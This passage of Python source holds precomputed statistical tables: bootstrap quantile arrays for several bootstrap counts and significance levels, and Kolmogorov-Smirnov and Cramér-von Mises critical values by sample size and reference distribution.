0.9092285537719738, 0.9216524505615247, 0.9344142532348645, 0.9476547241210949, 0.9616604995727549, 0.9772372436523449], 'num_bt = 100, alpha = 0.05': [0.0005128097534179688, 0.0035651397705078114, 0.008225822448730467, 0.01377662658691406, 0.019905586242675778, 0.026449737548828123, 0.03331188201904297, 0.040428848266601564, 0.0477566146850586, 0.055263214111328125, 0.06292453765869141, 0.07072181701660157, 0.07864017486572264, 0.0866675567626953, 0.09479404449462892, 0.10301116943359379, 0.11131214141845708, 0.1196907806396485, 0.12814197540283206, 0.13666130065917975, 0.14524478912353522, 0.15388900756835944, 0.16259090423583994, 0.17134765625000012, 0.18015705108642593, 0.18901679992675796, 0.19792491912841811, 0.2068797302246095, 0.21587963104248062, 0.22492324829101581, 0.23400913238525406, 0.24313629150390642, 0.2523035049438478, 0.26150985717773456, 0.2707544326782229, 0.2800365447998049, 0.2893553543090823, 0.29871025085449254, 0.30810070037841836, 0.31752601623535204, 0.32698581695556694, 0.33647972106933655, 0.34600734710693426, 0.3555682373046881, 0.36516231536865296, 0.37478912353515687, 0.3844486618041999, 0.39414070129394607, 0.4038650131225594, 0.41362174987793054, 0.42341068267822346, 0.4332318878173837, 0.443085365295411, 0.4529711914062508, 0.46288959503173915, 0.4728406524658212, 0.48282451629638756, 0.4928414916992196, 0.5028918075561533, 0.5129758453369149, 0.5230939102172858, 0.5332465362548835, 0.5434341049194344, 0.5536571502685554, 0.5639163589477547, 0.5742122650146493, 0.5845457077026375, 0.5949174499511725, 0.605328330993653, 0.6157794189453132, 0.6262716293334969, 0.6368063354492195, 0.6473846817016609, 0.6580081939697273, 0.6686784744262704, 0.6793972015380867, 0.6901663589477547, 0.7009882354736336, 0.7118651199340829, 0.7227997589111337, 0.7337952804565437, 0.7448551177978522, 0.7559832382202156, 0.767184143066407, 0.778463096618653, 0.7898260498046881, 0.8012801742553717, 0.812833862304688, 0.8244971847534186, 0.836282348632813, 
0.8482045364379889, 0.8602828979492192, 0.8725419998168951, 0.8850147247314459, 0.8977466201782232, 0.9108037567138676, 0.9242892074584965, 0.9383808135986333, 0.9534402084350593, 0.9704869842529305], 'num_bt = 100, alpha = 0.025': [0.00025318145751953127, 0.0024313354492187496, 0.00622997283935547, 0.011004486083984376, 0.016431846618652345, 0.022334899902343747, 0.02860530853271484, 0.03517158508300782, 0.04198360443115235, 0.04900466918945313, 0.056207008361816406, 0.06356887817382811, 0.07107303619384765, 0.07870536804199217, 0.0864543533325195, 0.09431030273437495, 0.10226490020751948, 0.11031120300292963, 0.11844318389892572, 0.12665557861328114, 0.13494373321533193, 0.14330360412597648, 0.15173160552978507, 0.1602246093749999, 0.16877971649169915, 0.1773944091796874, 0.18606639862060537, 0.19479362487792956, 0.20357418060302723, 0.21240638732910144, 0.22128879547119132, 0.23021987915039055, 0.23919857025146474, 0.24822349548339834, 0.25729381561279285, 0.26640838623046864, 0.2755665969848631, 0.2847674560546874, 0.2940104293823241, 0.3032947540283201, 0.31261997222900373, 0.32198554992675765, 0.33139102935791, 0.3408360290527342, 0.350320243835449, 0.35984336853027327, 0.369405174255371, 0.3790055084228515, 0.38864414215087884, 0.3983211517333983, 0.4080363082885741, 0.4177897644042967, 0.42758152008056627, 0.43741157531738273, 0.44728015899658197, 0.45718749999999997, 0.46713375091552733, 0.4771192169189453, 0.48714420318603513, 0.49720916748046873, 0.5073144912719727, 0.517460708618164, 0.5276483535766601, 0.5378781127929686, 0.5481506729125976, 0.5584667205810545, 0.5688272476196286, 0.5792331695556638, 0.589685478210449, 0.600185317993164, 0.6107340621948241, 0.6213330078124999, 0.631983757019043, 0.6426879119873048, 0.6534475326538087, 0.6642645263671876, 0.6751412582397462, 0.6860803222656253, 0.6970846176147463, 0.7081573486328125, 0.7193020248413087, 0.7305229187011719, 0.7418246078491211, 0.7532124328613279, 0.7646924972534177, 0.7762720489501949, 
0.7879593276977535, 0.7997643280029292, 0.8116988754272456, 0.8237773895263665, 0.8360177230834953, 0.8484423828124994, 0.8610802841186516, 0.8739700317382804, 0.8871651077270499, 0.9007428741455068, 0.9148239517211905, 0.9296160888671865, 0.9455405807495105, 0.9637833404541005], 'num_bt = 50, alpha = 0.1': [0.002104988098144531, 0.010686798095703127, 0.022243995666503903, 0.03534767150878906, 0.04944561004638671, 0.06426040649414061, 0.07962970733642577, 0.09544906616210938, 0.11164653778076172, 0.12817016601562498, 0.14498111724853516, 0.1620494842529297, 0.1793517684936524, 0.19686920166015628, 0.21458644866943363, 0.23249114990234374, 0.25057315826416016, 0.2688238525390625, 0.28723644256591796, 0.30580520629882824, 0.32452541351318376, 0.34339347839355494, 0.36240657806396515, 0.38156257629394563, 0.4008601760864261, 0.42029869079589877, 0.439878196716309, 0.45959922790527385, 0.4794631576538091, 0.4994721984863286, 0.5196290206909184, 0.5399374389648441, 0.5604021072387699, 0.5810285949707035, 0.601823997497559, 0.6227967071533207, 0.6439570236206058, 0.6653173065185549, 0.6868929672241213, 0.7087026977539064, 0.7307703018188476, 0.7531256103515627, 0.7758077621459962, 0.7988690185546876, 0.8223818588256835, 0.8464518737792968, 0.8712435531616209, 0.897040786743164, 0.9244193649291994, 0.9549925994873047], 'num_bt = 50, alpha = 0.05': [0.0010253524780273436, 0.007153701782226562, 0.016551856994628904, 0.027787704467773428, 0.040236625671386715, 0.053571395874023424, 0.06759670257568356, 0.08218505859375, 0.09724811553955079, 0.11272163391113282, 0.1285573959350586, 0.14471817016601565, 0.1611745834350586, 0.1779032135009766, 0.19488491058349616, 0.2121041107177735, 0.22954799652099614, 0.24720588684082034, 0.2650691604614259, 0.28313056945800796, 0.3013843917846682, 0.3198258972167971, 0.33845157623291044, 0.3572587585449221, 0.376245918273926, 0.395412063598633, 0.4147572708129885, 0.4342823791503908, 0.45398914337158225, 0.4738802337646486, 
0.4939592361450197, 0.5142308807373048, 0.5347008895874026, 0.5553767395019535, 0.5762670516967778, 0.5973825836181648, 0.6187364578247077, 0.6403443145751957, 0.6622255325317388, 0.6844039154052739, 0.7069094467163091, 0.7297798919677738, 0.7530647659301761, 0.7768299865722659, 0.8011670303344729, 0.826208877563477, 0.852162818908692, 0.8793858337402352, 0.9086018753051766, 0.9418449401855475], 'num_bt = 50, alpha = 0.025': [0.0005062484741210939, 0.004881439208984375, 0.012548561096191409, 0.022227935791015625, 0.03327510833740233, 0.045335311889648414, 0.058191719055175756, 0.07170074462890623, 0.08576206207275389, 0.10030220031738282, 0.11526584625244143, 0.1306098937988281, 0.1463006210327148, 0.1623106384277343, 0.17861782073974602, 0.1952041625976562, 0.21205471038818355, 0.22915710449218749, 0.24650104522705074, 0.26407836914062494, 0.28188220977783196, 0.29990722656249996, 0.31814914703369135, 0.3366050720214844, 0.3552730178833008, 0.37415191650390633, 0.3932419967651368, 0.4125440979003908, 0.4320604324340822, 0.4517940521240237, 0.47174915313720733, 0.4919313812255862, 0.5123475265502933, 0.5330061340332035, 0.5539176559448247, 0.5750946807861332, 0.5965523147583014, 0.6183092498779303, 0.6403881454467779, 0.6628169250488287, 0.685630607604981, 0.7088736724853519, 0.7326040267944338, 0.7568986511230471, 0.7818646621704104, 0.8076572418212895, 0.8345180892944339, 0.8628623962402346, 0.8935304641723636, 0.9288782501220707], 'num_bt = 30, alpha = 0.1': [0.003505865732828776, 0.0178689956665039, 0.03730777104695638, 0.05944360097249348, 0.08335453669230143, 0.10857747395833334, 0.13484245936075845, 0.16197719573974612, 0.18986501693725588, 0.21842352549235028, 0.24759359359741212, 0.2773321787516274, 0.3076083819071449, 0.33840077718098927, 0.3696960131327308, 0.40148760477701795, 0.4337754885355629, 0.4665662765502927, 0.4998735745747882, 0.5337188084920246, 0.5681330680847166, 0.6031595865885414, 0.6388580004374184, 0.6753109614054361, 0.7126363436381019, 
0.7510082880655921, 0.7907005627950029, 0.8321870803833004, 0.8764300346374508, 0.926118723551432], 'num_bt = 30, alpha = 0.05': [0.0017083168029785158, 0.011975797017415368, 0.02781553268432617, 0.04685484568277994, 0.06805556615193684, 0.09087403615315756, 0.11498689651489258, 0.14018510182698568, 0.1663259824117025, 0.19330844879150394, 0.22105944951375328, 0.2495258967081706, 0.2786695798238119, 0.30846405029296875, 0.3388926506042481, 0.3699475606282553, 0.4016289710998535, 0.4339452743530273, 0.46691370010375977, 0.5005613327026367, 0.5349272727966307, 0.5700660705566404, 0.6060525576273598, 0.6429908752441403, 0.6810288429260251, 0.7203848520914709, 0.7614021619160968, 0.8046739578247067, 0.851403903961181, 0.9049661636352534], 'num_bt = 30, alpha = 0.025': [0.0008435885111490885, 0.008178138732910154, 0.021117115020751948, 0.03755346934000651, 0.056421693166097, 0.07713553110758462, 0.09933786392211913, 0.12279478708902995, 0.1473451932271322, 0.1728741963704427, 0.19929863611857096, 0.22655766805013022, 0.2546075503031413, 0.283418083190918, 0.3129702568054199, 0.3432552337646484, 0.3742734591166178, 0.4060349146525065, 0.4385598182678224, 0.4718799591064454, 0.5060409863789878, 0.5411063512166342, 0.5771634737650556, 0.6143334706624354, 0.6527883211771653, 0.6927816390991218, 0.7347115516662605, 0.7792645772298182, 0.827830537160238, 0.8842966715494796], 'num_bt = 20, alpha = 0.1': [0.005254220962524414, 0.026914119720458988, 0.05641789436340332, 0.0902134895324707, 0.12692608833312985, 0.16587238311767571, 0.20666403770446767, 0.24906482696533194, 0.29292883872985825, 0.33817090988159165, 0.3847514629364012, 0.4326707839965818, 0.4819692134857176, 0.5327330589294432, 0.5851095676422118, 0.6393381118774413, 0.6958132266998289, 0.7552347183227537, 0.8190390110015868, 0.8912508964538572], 'num_bt = 20, alpha = 0.05': [0.002561426162719727, 0.01806516647338867, 0.04216942787170409, 0.07135391235351564, 0.1040808200836182, 0.13955373764038093, 
0.17731089591979982, 0.21706857681274416, 0.25865063667297367, 0.30195388793945327, 0.3469314098358156, 0.39358491897583026, 0.4419655323028567, 0.49218158721923855, 0.5444176197052006, 0.5989718437194829, 0.6563361644744876, 0.7173814773559575, 0.7838938236236577, 0.8608916282653813], 'num_bt = 20, alpha = 0.025': [0.0012650966644287111, 0.012348556518554692, 0.032070970535278326, 0.05733404159545899, 0.08657145500183107, 0.11893157958984377, 0.1539091587066651, 0.19119005203247075, 0.2305778980255127, 0.27195787429809565, 0.31527810096740716, 0.36054258346557605, 0.4078114986419677, 0.4572108268737792, 0.5089540958404539, 0.5633859634399412, 0.6210731983184814, 0.6830172538757324, 0.7512671947479248, 0.8315665245056152]} # noqa: E501, E231 crit_val_ini_ks = {0.001: {1000: {'uni': 0.06174732010933548, 'nor': 0.03896795290941646, 'beta1': 0.06139681196262953, 'beta2': 0.12199585736700946, 'beta4': 0.04582502097984753}, 750: {'uni': 0.07024635538683371, 'nor': 0.04459569470155689, 'beta1': 0.07021684632565739, 'beta2': 0.12815976069728274, 'beta4': 0.05264080908630758}, 500: {'uni': 0.08642770525355598, 'nor': 0.05509110394413119, 'beta1': 0.08761941562012493, 'beta2': 0.14913744793549832, 'beta4': 0.06421826877149445}, 400: {'uni': 0.09655798845997815, 'nor': 0.0613993273533881, 'beta1': 0.0964224097850293, 'beta2': 0.15858083637195353, 'beta4': 0.07290090814924588}, 300: {'uni': 0.11164843625013415, 'nor': 0.07106128126671396, 'beta1': 0.11009775320915205, 'beta2': 0.17523769295342007, 'beta4': 0.08305783948716328}, 200: {'uni': 0.13628359610263507, 'nor': 0.08740964922426725, 'beta1': 0.1376486743610651, 'beta2': 0.2010516066361282, 'beta4': 0.10286264686710184}, 150: {'uni': 0.15651662849813364, 'nor': 0.10038713469524929, 'beta1': 0.15819608234185656, 'beta2': 0.22229910725996993, 'beta4': 0.11634654326012955}, 100: {'uni': 0.19072306639877157, 'nor': 0.12280360833310089, 'beta1': 0.19321091289173042, 'beta2': 0.2581947494944321, 'beta4': 0.14328917055317145}, 
75: {'uni': 0.21934961884964826, 'nor': 0.14015948249260646, 'beta1': 0.2219326490803759, 'beta2': 0.2846540951939676, 'beta4': 0.1652852320527448}, 50: {'uni': 0.2645907926740654, 'nor': 0.1710961682554944, 'beta1': 0.2678719773943101, 'beta2': 0.3289035352446858, 'beta4': 0.1999598991299047}, 30: {'uni': 0.3379078488296823, 'nor': 0.21594948610382936, 'beta1': 0.3441129978995892, 'beta2': 0.39361692414493443, 'beta4': 0.2508472086556259}, 20: {'uni': 0.3959074827161117, 'nor': 0.2608433948642659, 'beta1': 0.4133477648489873, 'beta2': 0.44853631830721913, 'beta4': 0.29952120108891395}, 10: {'uni': 0.5170765814161853, 'nor': 0.35733312354157704, 'beta1': 0.5398708466808257, 'beta2': 0.5422967523113658, 'beta4': 0.40686356644018595}}, 0.005: {1000: {'uni': 0.05458116632544635, 'nor': 0.03504577921766977, 'beta1': 0.054517449744692026, 'beta2': 0.10728185476765839, 'beta4': 0.040733497260050544}, 750: {'uni': 0.06253533672182854, 'nor': 0.04046369401135186, 'beta1': 0.06282543848266553, 'beta2': 0.11279561980513325, 'beta4': 0.04705273659300363}, 500: {'uni': 0.07714054796228054, 'nor': 0.0496468687606364, 'beta1': 0.07693955943931102, 'beta2': 0.1327433163224424, 'beta4': 0.05731924299024538}, 400: {'uni': 0.08617878042484084, 'nor': 0.05541748786526407, 'beta1': 0.08588821546881897, 'beta2': 0.13875443390078235, 'beta4': 0.06439825899654178}, 300: {'uni': 0.0986714495305242, 'nor': 0.06407724459065156, 'beta1': 0.09855314389102021, 'beta2': 0.1548737996243767, 'beta4': 0.07467900099977004}, 200: {'uni': 0.12062451647295991, 'nor': 0.07827596978503826, 'beta1': 0.12126943895923059, 'beta2': 0.17825544608232347, 'beta4': 0.09076754278924304}, 150: {'uni': 0.1396796839473482, 'nor': 0.09009210049264571, 'beta1': 0.14063288933757345, 'beta2': 0.1973907310236372, 'beta4': 0.10499002205047378}, 100: {'uni': 0.16922995185830964, 'nor': 0.10980683219099052, 'beta1': 0.17129406122009094, 'beta2': 0.22813210844235704, 'beta4': 0.12749534525918932}, 75: {'uni': 
0.1953541681412001, 'nor': 0.12554665985678326, 'beta1': 0.19610381489611384, 'beta2': 0.25287194709425875, 'beta4': 0.1469739325714672}, 50: {'uni': 0.23503320028575814, 'nor': 0.15335710820924087, 'beta1': 0.23890161565850354, 'beta2': 0.2925965166545206, 'beta4': 0.17739407623100112}, 30: {'uni': 0.2976485313317806, 'nor': 0.19613498929034934, 'beta1': 0.3040864499477276, 'beta2': 0.35138347538048526, 'beta4': 0.22579108547722582}, 20: {'uni': 0.35388424243927113, 'nor': 0.23656926834477043, 'beta1': 0.36668171084515955, 'beta2': 0.39736542044382106, 'beta4': 0.2701286497170594}, 10: {'uni': 0.4630097657380493, 'nor': 0.3225433246916215, 'beta1': 0.47835376241010186, 'beta2': 0.4896209566095471, 'beta4': 0.36159750656596396}}, 0.01: {1000: {'uni': 0.05134454385349413, 'nor': 0.03330600875133105, 'beta1': 0.051275152087156495, 'beta2': 0.10009870323144221, 'beta4': 0.03865995666339189}, 750: {'uni': 0.05905726508494702, 'nor': 0.0383879788508078, 'beta1': 0.059272477516056354, 'beta2': 0.10502806705945988, 'beta4': 0.04450291981279328}, 500: {'uni': 0.07249296242654668, 'nor': 0.046932424204244594, 'beta1': 0.07240630431885364, 'beta2': 0.12408220110978818, 'beta4': 0.05424039706492939}, 400: {'uni': 0.080902691313323, 'nor': 0.05248129300353904, 'beta1': 0.08043677899242607, 'beta2': 0.12974923298059704, 'beta4': 0.06073621209890695}, 300: {'uni': 0.09306590895115929, 'nor': 0.06042909220901882, 'beta1': 0.0929294897119688, 'beta2': 0.14441139871845998, 'beta4': 0.07029934609881988}, 200: {'uni': 0.11331581936959173, 'nor': 0.07407780477974035, 'beta1': 0.11400852794991234, 'beta2': 0.16697088723911058, 'beta4': 0.08578814408291241}, 150: {'uni': 0.13110747055603822, 'nor': 0.08511174074211825, 'beta1': 0.13197498872552438, 'beta2': 0.18525721022812291, 'beta4': 0.09923887427643563}, 100: {'uni': 0.15947898396010982, 'nor': 0.10396630211898589, 'beta1': 0.16076780252138057, 'beta2': 0.21274473456821097, 'beta4': 0.1203847339328595}, 75: {'uni': 
0.18341423985159883, 'nor': 0.11924687585622445, 'beta1': 0.1847923465861807, 'beta2': 0.23689175806686585, 'beta4': 0.13862384194648647}, 50: {'uni': 0.22065058332465762, 'nor': 0.14525710370631756, 'beta1': 0.2245287846345721, 'beta2': 0.27453195725371937, 'beta4': 0.16751626430377106}, 30: {'uni': 0.2806366070013675, 'nor': 0.18585975643934483, 'beta1': 0.28507040255377625, 'beta2': 0.32929770986141144, 'beta4': 0.2134224231720387}, 20: {'uni': 0.3334575751692692, 'nor': 0.22511252321148278, 'beta1': 0.3441640350433964, 'beta2': 0.3740749374193295, 'beta4': 0.2544162136548306}, 10: {'uni': 0.4366755558485817, 'nor': 0.3071991308976279, 'beta1': 0.4527891584489994, 'beta2': 0.46379050302844543, 'beta4': 0.34067023770504523}}, 0.05: {1000: {'uni': 0.04280142303978185, 'nor': 0.02860827073335037, 'beta1': 0.04282682578644642, 'beta2': 0.07986970874762322, 'beta4': 0.03275686429767982}, 750: {'uni': 0.049427811587210435, 'nor': 0.03298169164204601, 'beta1': 0.049275909605582924, 'beta2': 0.08486927467601035, 'beta4': 0.03775404114622272}, 500: {'uni': 0.06038458458366747, 'nor': 0.04027106205628239, 'beta1': 0.060195942616294934, 'beta2': 0.09995114375214009, 'beta4': 0.04613912209290452}, 400: {'uni': 0.0671626804698282, 'nor': 0.044967180104620696, 'beta1': 0.06747611786364349, 'beta2': 0.10571668604744544, 'beta4': 0.05152182574562672}, 300: {'uni': 0.07742312239112692, 'nor': 0.051666837623702166, 'beta1': 0.07767087703759445, 'beta2': 0.1178767433776362, 'beta4': 0.059452507414415046}, 200: {'uni': 0.09469966587530276, 'nor': 0.06343358521113673, 'beta1': 0.0950578895294647, 'beta2': 0.1366784736556006, 'beta4': 0.07255703928500457}, 150: {'uni': 0.10900935208153273, 'nor': 0.07289171579483816, 'beta1': 0.11002479909769114, 'beta2': 0.15242729269865973, 'beta4': 0.08373240678443566}, 100: {'uni': 0.13281274766076206, 'nor': 0.08920713936479638, 'beta1': 0.13377803165947766, 'beta2': 0.17499650468558625, 'beta4': 0.10190606958299475}, 75: {'uni': 
0.15239779918045748, 'nor': 0.10243980804370362, 'beta1': 0.1541106817008704, 'beta2': 0.19485071272087295, 'beta4': 0.11705102736538112}, 50: {'uni': 0.18438141684534104, 'nor': 0.12466885274854955, 'beta1': 0.18728113451838269, 'beta2': 0.22658281610394648, 'beta4': 0.14239913459102727}, 30: {'uni': 0.23331654346299174, 'nor': 0.15906588455123438, 'beta1': 0.2387860500631408, 'beta2': 0.2718245732806131, 'beta4': 0.18048185108580744}, 20: {'uni': 0.2786314950878662, 'nor': 0.19349526617388257, 'beta1': 0.28589622085949756, 'beta2': 0.31147388293415956, 'beta4': 0.2164769385370286}, 10: {'uni': 0.3661289030334679, 'nor': 0.2658953985567251, 'beta1': 0.379401813819888, 'beta2': 0.38802519102270194, 'beta4': 0.2910744690699496}}, 0.1: {1000: {'uni': 0.038515938269794825, 'nor': 0.026313661922827247, 'beta1': 0.03860111298969593, 'beta2': 0.0695550650755411, 'beta4': 0.029845093507530562}, 750: {'uni': 0.04446055609985289, 'nor': 0.030266189959470058, 'beta1': 0.044472158939188655, 'beta2': 0.07438972690212953, 'beta4': 0.03440796201601326}, 500: {'uni': 0.054329235300242695, 'nor': 0.03705807984250126, 'beta1': 0.054235810729029665, 'beta2': 0.08755778874782771, 'beta4': 0.04215154900032181}, 400: {'uni': 0.06062042253055755, 'nor': 0.04134489759753035, 'beta1': 0.06087419042912867, 'beta2': 0.09290608277922241, 'beta4': 0.04695774138644898}, 300: {'uni': 0.06979122578785563, 'nor': 0.04752352646874458, 'beta1': 0.06987407314079985, 'beta2': 0.1036455137376669, 'beta4': 0.05408391441556548}, 200: {'uni': 0.08525612760509743, 'nor': 0.05822021391999288, 'beta1': 0.08573405996535222, 'beta2': 0.12083720989995606, 'beta4': 0.06606270634268102}, 150: {'uni': 0.09822498098395582, 'nor': 0.0670687425730856, 'beta1': 0.09891726246491339, 'beta2': 0.134942222786968, 'beta4': 0.07625187550090379}, 100: {'uni': 0.11942187198187654, 'nor': 0.08196700841704041, 'beta1': 0.12048182599113988, 'beta2': 0.15542188429324677, 'beta4': 0.0927888394179889}, 75: {'uni': 
0.13700377353508753, 'nor': 0.09413798516069916, 'beta1': 0.13863023455324552, 'beta2': 0.1728224431499087, 'beta4': 0.10651114960711697}, 50: {'uni': 0.16595760075302907, 'nor': 0.11446069154286698, 'beta1': 0.1684755311187931, 'beta2': 0.20208064524892055, 'beta4': 0.12935863603313313}, 30: {'uni': 0.2099293273700812, 'nor': 0.1463282048690624, 'beta1': 0.21473921841431154, 'beta2': 0.24269192295102882, 'beta4': 0.1646851441089735}, 20: {'uni': 0.25056763248182895, 'nor': 0.17786313124907188, 'beta1': 0.2575087202242632, 'beta2': 0.27927953593860777, 'beta4': 0.19740515280724447}, 10: {'uni': 0.3304962789807138, 'nor': 0.2447591671591835, 'beta1': 0.3420336141758848, 'beta2': 0.34940564498843646, 'beta4': 0.26587190498978686}}, 0.2: {1000: {'uni': 0.033759081350374254, 'nor': 0.02372992290154119, 'beta1': 0.03379104644423217, 'beta2': 0.05775603239505678, 'beta4': 0.026618493861847614}, 750: {'uni': 0.03897357249045624, 'nor': 0.027281398645080723, 'beta1': 0.038972994365299635, 'beta2': 0.0621653283130667, 'beta4': 0.030665891126849754}, 500: {'uni': 0.04758909935471711, 'nor': 0.03337684532828111, 'beta1': 0.047570804678383094, 'beta2': 0.07333077050088904, 'beta4': 0.037565566599256583}, 400: {'uni': 0.053119550234104085, 'nor': 0.03725028390570345, 'beta1': 0.053295404906414934, 'beta2': 0.0782294183344644, 'beta4': 0.04183281867666566}, 300: {'uni': 0.061196404682106964, 'nor': 0.04292324729747321, 'beta1': 0.06136906566660827, 'beta2': 0.08744970320312462, 'beta4': 0.04824159064240345}, 200: {'uni': 0.0746784511345509, 'nor': 0.0524733341649114, 'beta1': 0.07510973684586475, 'beta2': 0.10260712327402122, 'beta4': 0.058942065335903404}, 150: {'uni': 0.08595093737016697, 'nor': 0.060424202583133746, 'beta1': 0.08641030234814334, 'beta2': 0.1148837044228368, 'beta4': 0.0679067944916304}, 100: {'uni': 0.10443555935757931, 'nor': 0.07374329417580833, 'beta1': 0.10551157755974006, 'beta2': 0.13294004606451998, 'beta4': 0.08265330043672003}, 75: {'uni': 
0.11993235153506276, 'nor': 0.08480408445268339, 'beta1': 0.12138149971982604, 'beta2': 0.14821067875308103, 'beta4': 0.09487982606384139}, 50: {'uni': 0.1450901598179003, 'nor': 0.10314539464936745, 'beta1': 0.14745197306443125, 'beta2': 0.17411692213927954, 'beta4': 0.11517539906859259}, 30: {'uni': 0.18368281401813502, 'nor': 0.1321090658183411, 'beta1': 0.1875463935108379, 'beta2': 0.21006490447672693, 'beta4': 0.14663588943386274}, 20: {'uni': 0.2196807646682773, 'nor': 0.15994694395320508, 'beta1': 0.22522106948161613, 'beta2': 0.24235899456781695, 'beta4': 0.17573119318593766}, 10: {'uni': 0.2888943190995493, 'nor': 0.220722689927199, 'beta1': 0.2985481150360235, 'beta2': 0.3045137581383749, 'beta4': 0.236985210651535}}, 0.25: {1000: {'uni': 0.032062416809360894, 'nor': 0.0227866671462571, 'beta1': 0.03208834216728629, 'beta2': 0.05337049741834132, 'beta4': 0.025475357813055488}, 750: {'uni': 0.03701423511603763, 'nor': 0.026225229844276166, 'beta1': 0.03703256957864909, 'beta2': 0.057813715669675636, 'beta4': 0.02936248102422831}, 500: {'uni': 0.045227717679089396, 'nor': 0.0320485047106529, 'beta1': 0.04519714698473515, 'beta2': 0.06831356769816821, 'beta4': 0.03593644546272762}, 400: {'uni': 0.050450659079979754, 'nor': 0.03581784094010593, 'beta1': 0.05056637414823473, 'beta2': 0.0729182038087659, 'beta4': 0.04001889562676658}, 300: {'uni': 0.058161445018157565, 'nor': 0.041252983698886025, 'beta1': 0.058325688269647125, 'beta2': 0.08170482185096284, 'beta4': 0.04612705504436812}, 200: {'uni': 0.07094962986364317, 'nor': 0.05046048885276999, 'beta1': 0.0712213019748647, 'beta2': 0.09581725770034533, 'beta4': 0.0563670463913345}, 150: {'uni': 0.0815744257595088, 'nor': 0.058060489761412676, 'beta1': 0.08204932927986253, 'beta2': 0.1075479659950831, 'beta4': 0.06500871809976655}, 100: {'uni': 0.09912785547497138, 'nor': 0.0707907611619234, 'beta1': 0.10021469580117251, 'beta2': 0.12475954060183503, 'beta4': 0.0790298213954928}, 75: {'uni': 
0.11388087855996165, 'nor': 0.08144708523365077, 'beta1': 0.1151935997969889, 'beta2': 0.13944968782072553, 'beta4': 0.09073471227314939}, 50: {'uni': 0.13765260055314554, 'nor': 0.0991006689972383, 'beta1': 0.13998309637363815, 'beta2': 0.16393144318454161, 'beta4': 0.11023561371839477}, 30: {'uni': 0.1741856459150477, 'nor': 0.1269186751139828, 'beta1': 0.1778768200120303, 'beta2': 0.19832202672268084, 'beta4': 0.14017916545551046}, 20: {'uni': 0.20839509742333207, 'nor': 0.1535088033354377, 'beta1': 0.21387705197529588, 'beta2': 0.22870691603776427, 'beta4': 0.16824942099586182}, 10: {'uni': 0.2740727774470333, 'nor': 0.21222634033868049, 'beta1': 0.2828793884551896, 'beta2': 0.288383430493807, 'beta4': 0.22670497011739216}}, 0.3: {1000: {'uni': 0.03057612825774314, 'nor': 0.02199386622109878, 'beta1': 0.03061262686465055, 'beta2': 0.049703953698298386, 'beta4': 0.02447722233427918}, 750: {'uni': 0.03533838333580652, 'nor': 0.02530417208682001, 'beta1': 0.03537355380273649, 'beta2': 0.05399871759330599, 'beta4': 0.02823270309239162}, 500: {'uni': 0.043123689527982734, 'nor': 0.030927801548839978, 'beta1': 0.043123330457107534, 'beta2': 0.06396221956203696, 'beta4': 0.034528974097892545}, 400: {'uni': 0.04814799667805744, 'nor': 0.03456908247933843, 'beta1': 0.04823146494173067, 'beta2': 0.06837351075097187, 'beta4': 0.038486897300680556}, 300: {'uni': 0.05550906419590629, 'nor': 0.03978480548326124, 'beta1': 0.05571141547789926, 'beta2': 0.07663630270628857, 'beta4': 0.04434408116637903}, 200: {'uni': 0.06762156145960091, 'nor': 0.048648082377034274, 'beta1': 0.06798995743435188, 'beta2': 0.0901597857532756, 'beta4': 0.05417087708582158}, 150: {'uni': 0.0777889938150631, 'nor': 0.055992681950055134, 'beta1': 0.078310929702266, 'beta2': 0.10131183123822018, 'beta4': 0.062417414108562386}, 100: {'uni': 0.09459233371131393, 'nor': 0.06828184758918193, 'beta1': 0.09551945542738993, 'beta2': 0.1178069154885687, 'beta4': 0.07593328084768572}, 75: {'uni': 
0.10866796055687228, 'nor': 0.07853952378167028, 'beta1': 0.10982303249195069, 'beta2': 0.13190968528845182, 'beta4': 0.08730445455818964}, 50: {'uni': 0.13131745651785992, 'nor': 0.09562198442675823, 'beta1': 0.1335175652395422, 'beta2': 0.15495495520954616, 'beta4': 0.10586806539719948}, 30: {'uni': 0.16622024765958232, 'nor': 0.1224700829191776, 'beta1': 0.16965623137726848, 'beta2': 0.18803738711333812, 'beta4': 0.13470969723802004}, 20: {'uni': 0.19877030362889103, 'nor': 0.14799815211895767, 'beta1': 0.20344160260647876, 'beta2': 0.21717215473139662, 'beta4': 0.161706399244382}, 10: {'uni': 0.26145583014921425, 'nor': 0.2046385546777918, 'beta1': 0.2695783330780789, 'beta2': 0.2744402713994778, 'beta4': 0.21759542548906985}}} # noqa: E501, E231 crit_val_ini_cm = {0.05: {1000: {'uni': 0.4594653273130281, 'nor': 0.12548409215203657, 'beta1': 0.4601325244776592, 'beta2': 2.6054538536684997, 'beta4': 0.19475509620124962}, 750: {'uni': 0.45799049980605744, 'nor': 0.12602524417442473, 'beta1': 0.46004206806029374, 'beta2': 2.1329896811378033, 'beta4': 0.19489847773362395}, 500: {'uni': 0.45925627371563715, 'nor': 0.12628494613337185, 'beta1': 0.46043257598514326, 'beta2': 1.8976333035266344, 'beta4': 0.19472713920556675}, 400: {'uni': 0.4550317088764882, 'nor': 0.12598689815558065, 'beta1': 0.4616845122929176, 'beta2': 1.67081859009825, 'beta4': 0.19310625273502202}, 300: {'uni': 0.4526386955716205, 'nor': 0.1258215616832631, 'beta1': 0.4621300837641701, 'beta2': 1.5237466437923628, 'beta4': 0.19308530495744508}, 200: {'uni': 0.4518991017642939, 'nor': 0.12579322471148224, 'beta1': 0.45814779697632135, 'beta2': 1.3141217632115256, 'beta4': 0.1907182023495619}, 150: {'uni': 0.4435801756869992, 'nor': 0.1261943477466138, 'beta1': 0.4603257655776193, 'beta2': 1.197499866156661, 'beta4': 0.19138023143214206}, 100: {'uni': 0.44398214960811005, 'nor': 0.1251049524249278, 'beta1': 0.45613701682564656, 'beta2': 1.0199854820373724, 'beta4': 0.1912520049669216}, 75: {'uni': 
